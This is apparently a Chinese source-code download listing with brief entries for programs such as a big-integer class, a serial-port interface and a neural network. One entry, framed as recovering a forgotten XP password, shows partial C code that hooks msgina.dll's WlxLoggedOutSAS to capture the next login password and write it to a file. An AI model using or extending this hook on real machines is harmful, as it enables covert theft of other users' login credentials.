-
一个可以对任意长整数进行加减的类 可以是任何长度的进行加减乘除 如有错误 请指出...
一个可以对任意长整数进行加减的类 可以是任何长度的进行加减乘除 如有错误 请指出-An arbitrary long integer addition and subtraction to the class can be of any length to carry out any calculation error Please indicate
- 2022-06-26 21:13:10下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
一个在DOS下计算CPU速度、获得计算机名、判断操作系统、获得计算机IP地址等小程序...
一个在DOS下计算CPU速度、获得计算机名、判断操作系统、获得计算机IP地址等小程序-a DOS computing CPU speed, computer access, and judgment operating system, computer IP address of small programs
- 2022-02-03 14:10:56下载
- 积分:1
-
串口接口程序可以接受电源屏通过串口发送过来的数据并通过共享内存和其他进程交换数据...
串口接口程序可以接受电源屏通过串口发送过来的数据并通过共享内存和其他进程交换数据-Serial interface program can accept the power panel through the serial port to send over the data and other processes through shared memory and the exchange of data
- 2022-01-26 06:45:08下载
- 积分:1
-
Java微信认证——access_token定时刷新——微信支付
主要是微信接入,access_token定时获取,微信支付
- 2022-07-11 01:09:30下载
- 积分:1
-
vector character display program
矢量字的显示程序-vector character display program
- 2022-12-21 04:30:03下载
- 积分:1
-
IE浏览器防止主页篡改驱动程序源码
通过注册表回调实现的防护Windows上的IE浏览器主页的驱动程序,严密防护IE主页键的修改、删除、重命名等操作
- 2022-10-21 06:20:03下载
- 积分:1
-
人工神经网络算法,神经网络,双输入,一个输出
人工神经网络算法的实现,bp神经网络,二输入,一输出-Artificial neural network algorithm, bp neural network, two input, one output
- 2022-03-20 21:29:24下载
- 积分:1
-
从CListCtr派生出来的类CSortListCtr,可排序
从CListCtr派生出来的类CSortListCtr,可排序-CListCtr derived from the class CSortListCtr, ranking
- 2023-03-24 19:25:03下载
- 积分:1
-
- 2022-01-22 06:42:08下载
- 积分:1